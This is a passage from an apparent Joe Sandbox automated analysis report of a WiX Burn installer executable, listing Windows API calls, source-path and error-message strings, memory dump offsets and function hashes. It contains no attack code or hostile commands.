                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                  • String ID: Failed to treat attribute value as UInt64.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlGetAttribute
                                                                                                                                                                  • API String ID: 3379191133-2593243594
                                                                                                                                                                  • Opcode ID: c2b8ceddda952073e5e23c86ec1088c07f3fadac6b914461a5acd0ca32c06df9
                                                                                                                                                                  • Instruction ID: 57b4e3f22c514daaa3f25e1cf3a7921d15dd2f8af87a560527270f16ab4c50ee
                                                                                                                                                                  • Opcode Fuzzy Hash: c2b8ceddda952073e5e23c86ec1088c07f3fadac6b914461a5acd0ca32c06df9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A119172E40318FFDB119F54CC82EAEBB78EB45754F10C0A5F909AB291E2718E00DA90
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,0092C427,?,?,00000004,?,00000004), ref: 009734F1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0092C427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009734FB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                  • String ID: Failed to read data from file handle.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 1948546556-2736598211
                                                                                                                                                                  • Opcode ID: b889404968f219cc2e7856b549b498d9ee62f9f2785b55b955132cec45c162c4
                                                                                                                                                                  • Instruction ID: 6e4936ccd99ce930a0858d00c562fbb4ab92b67aa870de984f5ed7b5ed19a7d3
                                                                                                                                                                  • Opcode Fuzzy Hash: b889404968f219cc2e7856b549b498d9ee62f9f2785b55b955132cec45c162c4
                                                                                                                                                                  • Instruction Fuzzy Hash: BA019273B41238BBD7209A99DC85FAFB66CAB55B64F11C525BE0CF7140E264AF0062E1
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,00927102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00916EDE,00000000), ref: 0096CB9B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open key: %ls, xrefs: 0096CB39
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096CB48, 0096CB84
                                                                                                                                                                  • Failed to read value: %ls/@%ls, xrefs: 0096CB75
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: Failed to open key: %ls$Failed to read value: %ls/@%ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 47109696-2566192520
                                                                                                                                                                  • Opcode ID: 6cabb727815de78f18815ee95f2f9c536cc01db2af9a5f416c7cbcc91ad273de
                                                                                                                                                                  • Instruction ID: 2035e71f2461c27a93f0cc62f7f8793a1f8bd5a0ae2e3d596db1b7f713153025
                                                                                                                                                                  • Opcode Fuzzy Hash: 6cabb727815de78f18815ee95f2f9c536cc01db2af9a5f416c7cbcc91ad273de
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E118672A40228BBDF225E94CC07FFE7A69DB45714F044110FB9476190D2B58E61F7D1
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917357
                                                                                                                                                                  • Failed while running , xrefs: 00917345
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostWindow
                                                                                                                                                                  • String ID: Failed while running $d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 3618638489-2348268852
                                                                                                                                                                  • Opcode ID: 5bdd1ef5a7c9cf5fe0916fc15961b5a337ba4f85db8151d2d07dc12869e865d8
                                                                                                                                                                  • Instruction ID: e8f22b63c2c5c239c5bd2ecb398b28a1ca593e56e7524e326a611e8698f9c942
                                                                                                                                                                  • Opcode Fuzzy Hash: 5bdd1ef5a7c9cf5fe0916fc15961b5a337ba4f85db8151d2d07dc12869e865d8
                                                                                                                                                                  • Instruction Fuzzy Hash: 9311A132B0420EBADB11ABE4DC06FEEF6BCAB44710F104526F915E1091E7749AD5EB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 009197B5
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
                                                                                                                                                                    • Part of subcall function 00918AA9: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 00918B61
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get 64-bit folder., xrefs: 009197D8
                                                                                                                                                                  • Failed to set variant value., xrefs: 009197FF
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919811
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get 64-bit folder.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3109562764-867371702
                                                                                                                                                                  • Opcode ID: 064badb03e35f190dbc9cc297a8daf171605411369086309ae3693c8acfef55a
                                                                                                                                                                  • Instruction ID: a279bffe7cdefadaa722a7ac339292b8a6f4b447c572e1834622ff30394a6910
                                                                                                                                                                  • Opcode Fuzzy Hash: 064badb03e35f190dbc9cc297a8daf171605411369086309ae3693c8acfef55a
                                                                                                                                                                  • Instruction Fuzzy Hash: F6019671F4021CBADB21AB95CC16FDFBA6CAF81B50F104162B504B6291D6B09A809790
                                                                                                                                                                  APIs
                                                                                                                                                                  • ControlService.ADVAPI32(0094984C,00000001,?,00000000,00000000,?,?,?,?,?,?,0094984C,00000000), ref: 00949994
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,0094984C,00000000), ref: 0094999E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ControlErrorLastService
                                                                                                                                                                  • String ID: Failed to stop wusa service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
                                                                                                                                                                  • API String ID: 4114567744-2199517983
                                                                                                                                                                  • Opcode ID: cfd94845ee419dd9406852b1120baffc67f3427c788ca1a5832d8c7b57b39fe7
                                                                                                                                                                  • Instruction ID: 83898515ec735dbd745b2f1c7f370af204f4a7a6a2dbbde94f5ae23122b1f940
                                                                                                                                                                  • Opcode Fuzzy Hash: cfd94845ee419dd9406852b1120baffc67f3427c788ca1a5832d8c7b57b39fe7
                                                                                                                                                                  • Instruction Fuzzy Hash: A201D873B5022877DB1096699C45FAFB6ACAB89B54F014129FD04FB280E574EC4046E5
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00925766: GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 00925793
                                                                                                                                                                    • Part of subcall function 00925766: FreeLibrary.KERNEL32(?), ref: 009257BA
                                                                                                                                                                    • Part of subcall function 00925766: GetLastError.KERNEL32 ref: 009257C4
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 00916DBC
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00916DCB
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 00916C99
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00916D30
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCloseCriticalDeleteErrorFreeHandleLastLibraryProcSection
                                                                                                                                                                  • String ID: Failed to start bootstrapper application.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 835895727-2315492815
APIs
• GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0091E202,0100147D,?,?,00000000,00000000), ref: 00973B7B
• GetLastError.KERNEL32(?,?,?,0091E202,0100147D,?,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 00973B85
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ErrorFileLastSize
• String ID: Failed to get size of file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 464720113-3816715765
APIs
• SysAllocString.OLEAUT32(?), ref: 00970489
• SysFreeString.OLEAUT32(00000000), ref: 009704DB
Similarity
• API ID: String$AllocFree
• String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
• API String ID: 344208780-608482133
APIs
  • Part of subcall function 009113DA: GetModuleHandleW.KERNEL32(kernel32,00000000,009115E3,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113ED
  • Part of subcall function 009113DA: GetLastError.KERNEL32(?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 009113F9
• LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
• GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp, xrefs: 00911888, 0091188D, 0091189F
• Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32., xrefs: 00911893
Similarity
• API ID: ErrorLast$HandleLibraryLoadModule
• String ID: Failed to get load library with LOAD_LIBRARY_SEARCH_SYSTEM32.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
• API String ID: 4252302101-2751505537
APIs
• GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 00925793
• FreeLibrary.KERNEL32(?), ref: 009257BA
• GetLastError.KERNEL32 ref: 009257C4
Strings
• BootstrapperApplicationDestroy, xrefs: 0092578B
Similarity
• API ID: AddressErrorFreeLastLibraryProc
• String ID: BootstrapperApplicationDestroy
• API String ID: 1144718084-3186005537
APIs
• RegSetValueExW.ADVAPI32(?,00927A20,00916CF2,EstimatedSize,000000FF,00916CF2,00000000,?,00929AF0,00000000,00000390,000000F8,00916CF2,009331C1,00000000,00000000), ref: 0096D7AD
Similarity
• API ID: Value
• String ID: EstimatedSize$Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3702945584-416555833
APIs
• SysAllocString.OLEAUT32(00917D5B), ref: 00970050
• SysFreeString.OLEAUT32(00000000), ref: 009700A0
Similarity
• API ID: String$AllocFree
• String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
• API String ID: 344208780-608482133
APIs
• CompareStringOrdinal.KERNEL32(00000000,00000009,00000008,0000000D,00000001,00000000,00000001,?,00971359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014), ref: 0097119A
• GetLastError.KERNEL32(?,00971359,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014,00000015,00000010,00000011,0000000C,0000000D,00000008,00000009), ref: 009711A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastOrdinalString
                                                                                                                                                                  • String ID: Failed to compare version substrings$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
                                                                                                                                                                  • API String ID: 2427233125-1336685116
                                                                                                                                                                  • Opcode ID: ce31c5a1081a1f8b1346d484a50a380489d1b6f0d3417553eb84eba65deee7c2
                                                                                                                                                                  • Instruction ID: 8c84f967525aa81f3e9631effb3f2511d0e25d97b39b4ba765868f6f866874c6
                                                                                                                                                                  • Opcode Fuzzy Hash: ce31c5a1081a1f8b1346d484a50a380489d1b6f0d3417553eb84eba65deee7c2
                                                                                                                                                                  • Instruction Fuzzy Hash: 17F0283368032977DB215E999C0AF9B7F5CEF98BA0F014401FE08AE291E6B1CC50C6E0
APIs
• GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
• FreeLibrary.KERNEL32(00000000), ref: 0092061E
• GetLastError.KERNEL32 ref: 00920628
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressErrorFreeLastLibraryProc
• String ID: BundleExtensionDestroy
• API String ID: 1144718084-3206861012
• Opcode ID: c605d6a620918635b663eed762860f0adab9c65e15ceb14f21dc3affd011196d
• Instruction ID: a483e9258421475f2c41835e32e25a72e2d9ced2bb74d572ffaa6ccc102985ba
• Opcode Fuzzy Hash: c605d6a620918635b663eed762860f0adab9c65e15ceb14f21dc3affd011196d
• Instruction Fuzzy Hash: 6F018F32500216EFDB109F65EC8965EFBB8FF84305F108979E41AE3161EB70E990DB50
APIs
  • Part of subcall function 009701DE: VariantInit.OLEAUT32(?), ref: 009701F5
  • Part of subcall function 009701DE: VariantClear.OLEAUT32(?), ref: 00970340
  • Part of subcall function 009701DE: SysFreeString.OLEAUT32(00000000), ref: 0097034B
• CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,00917D9B,?,00000000,00000000,?,?,0091BB5B,00917D9B,Hidden,?), ref: 00970563
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00970544
• Failed to get attribute., xrefs: 00970535
• yes, xrefs: 00970555
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: StringVariant$ClearCompareFreeInit
• String ID: Failed to get attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$yes
• API String ID: 2896382772-315762043
• Opcode ID: c9f88de32bb96ea36ad631e73e0594b658375acd72b083775aae004bf2874b16
• Instruction ID: d7dae8b849578be6a47781d1293302dd1489708a341e5f13f9508e6f9374d253
• Opcode Fuzzy Hash: c9f88de32bb96ea36ad631e73e0594b658375acd72b083775aae004bf2874b16
• Instruction Fuzzy Hash: 3F014E32A84228FBCF10AAA4CC0BFDE7A64DB81764F10C310B918B61D0C6704B00DB90
APIs
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00919730
  • Part of subcall function 0096BCAF: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096BCD0
  • Part of subcall function 0096BCAF: GetLastError.KERNEL32 ref: 0096BCDA
Strings
• Failed to set variant value., xrefs: 0091977A
• Failed to check if process token has privilege: %ls., xrefs: 00919745
• d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919757, 0091978C
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CurrentErrorLastLookupPrivilegeProcessValue
• String ID: Failed to check if process token has privilege: %ls.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 3865200005-2747678004
• Opcode ID: 03e80bdedd2b5d59e18ded357d64bfe7953837dff225ebb32ff1b6c50b2c927e
• Instruction ID: 06adb8729ca8d9dd07be8242d20f1da44baeb3e54b77955fcd738cedeffe4688
• Opcode Fuzzy Hash: 03e80bdedd2b5d59e18ded357d64bfe7953837dff225ebb32ff1b6c50b2c927e
• Instruction Fuzzy Hash: 46F0C872B80218B7EB11BA54DC07FDE395CDF40BA4F004150FA44FA2C1EBB09A5057E0
APIs
• GetCurrentProcess.KERNEL32(?), ref: 0091943F
  • Part of subcall function 0096BD94: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,0091944B,00000000), ref: 0096BDA7
  • Part of subcall function 0096BD94: GetProcAddress.KERNEL32(00000000), ref: 0096BDAE
  • Part of subcall function 0096BD94: GetLastError.KERNEL32(?,?,?,?,0091944B,00000000), ref: 0096BDD8
Strings
• Failed to set variant value., xrefs: 0091947F
• Failed to get native machine value., xrefs: 00919451
• d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919491
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressCurrentErrorHandleLastModuleProcProcess
• String ID: Failed to get native machine value.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 896058289-3337725491
• Opcode ID: 583520bdedca9b222402d4efc34a14ef206ff0bcf1d6505fd8ca7e5bdbb59d29
• Instruction ID: 2a7166367dddf2c0000fbb312668825ec436ff7db0d490c591f02fa928845908
• Opcode Fuzzy Hash: 583520bdedca9b222402d4efc34a14ef206ff0bcf1d6505fd8ca7e5bdbb59d29
• Instruction Fuzzy Hash: ACF024B2F8133872DB22B6998C1AFDF665C8B85B50F000151B948FB2D1F6A4DD8087E1
APIs
  • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
  • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
  • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
• IsWindow.USER32(?), ref: 00917385
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
Strings
• d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
• Failed to create the message window., xrefs: 009171A8
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
• String ID: Failed to create the message window.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
• API String ID: 1565363025-1122250624
• Opcode ID: 3d4e88d0309193c665ad6ab832a8fc7105dcf34ddb07da242efc574343cdf312
• Instruction ID: 24bc83c237d4e2db07723d7b50c146719a2248dd60102e1edcefde72ad811d3f
• Opcode Fuzzy Hash: 3d4e88d0309193c665ad6ab832a8fc7105dcf34ddb07da242efc574343cdf312
• Instruction Fuzzy Hash: 52F0C231744609BADB1177A0EC4AFEEF678AB90701F104011F505A40A1D7B19AD5FA60
                                                                                                                                                                  APIs
